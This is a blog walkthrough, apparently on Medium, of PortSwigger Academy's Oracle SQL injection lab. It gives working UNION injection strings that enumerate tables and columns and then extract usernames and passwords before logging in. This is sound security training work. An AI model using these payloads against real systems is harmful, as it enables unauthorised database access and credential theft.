Open in app

Sign in

Write

Sign in

Write-up: SQL injection attack, listing the database contents on Oracle @ PortSwigger Academy

Frank Leitner
3 min readJun 6, 2022

This write-up for the lab SQL injection attack, listing the database contents on Oracle is part of my walkthrough series for PortSwigger’s Web Security Academy.

Learning path: Server-side topics → SQL injection

Lab: SQL injection attack, listing the database contents on Oracle | Web Security Academy

Practise exploiting vulnerabilities on realistic targets. Record your progression from Apprentice to Expert. See where…

portswigger.net

Python script: script.py

Lab description

Query

The query used in the lab will look something like

SELECT * FROM someTable WHERE category = '<CATEGORY>'

Steps

The first steps are identical to the labs SQL injection UNION attack, determining the number of columns returned by the query and SQL injection UNION attack, finding a column containing text and are not repeated here.

As a result of these steps, I find out that the number of columns is 2, with both being string columns.

Find users table

The database in use here is Oracle, which holds the table information in the all_tables-table. In the relevant documentation, the available columns are listed.

I am interested in table_name. So I inject ' UNION SELECT table_name, null from all_tables-- into the parameter to form the following query:

I also select an invalid category so that only my output appears.

SELECT * FROM someTable WHERE category='X' UNION SELECT table_name, null from all_tables--'`

Enumerate columns in this table

The all_tab_columns-table holds information about the columns of each table, specifically the column_name column. The proper string to inject is ' UNION SELECT column_name, null from all_tab_columns WHERE table_name = 'USERS_TOAEAL'-- to form this query

SELECT * FROM someTable WHERE category='X' UNION SELECT column_name, null from all_tab_columns WHERE table_name = 'USERS_TOAEAL'--'`

Enumerate all usernames and passwords

Now I have all information to obtain the required usernames and passwords. I inject ' UNION SELECT USERNAME_DINZLR, PASSWORD_BTNGGB from USERS_TOAEAL-- to form this query:

SELECT * FROM someTable WHERE category='X' UNION SELECT USERNAME_DINZLR, PASSWORD_BTNGGB from USERS_TOAEAL--'`

The last step is to simply log in to solve this exercise.

Originally published at https://github.com.

Portswigger
Portswigger Lab
Writeup
Walkthrough
Sql Injection

--

--

Frank Leitner

Written by Frank Leitner

322 Followers

Tech nerd, doing security stuff for fun and some as a job | CISSP-ISSAP, OSCP

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams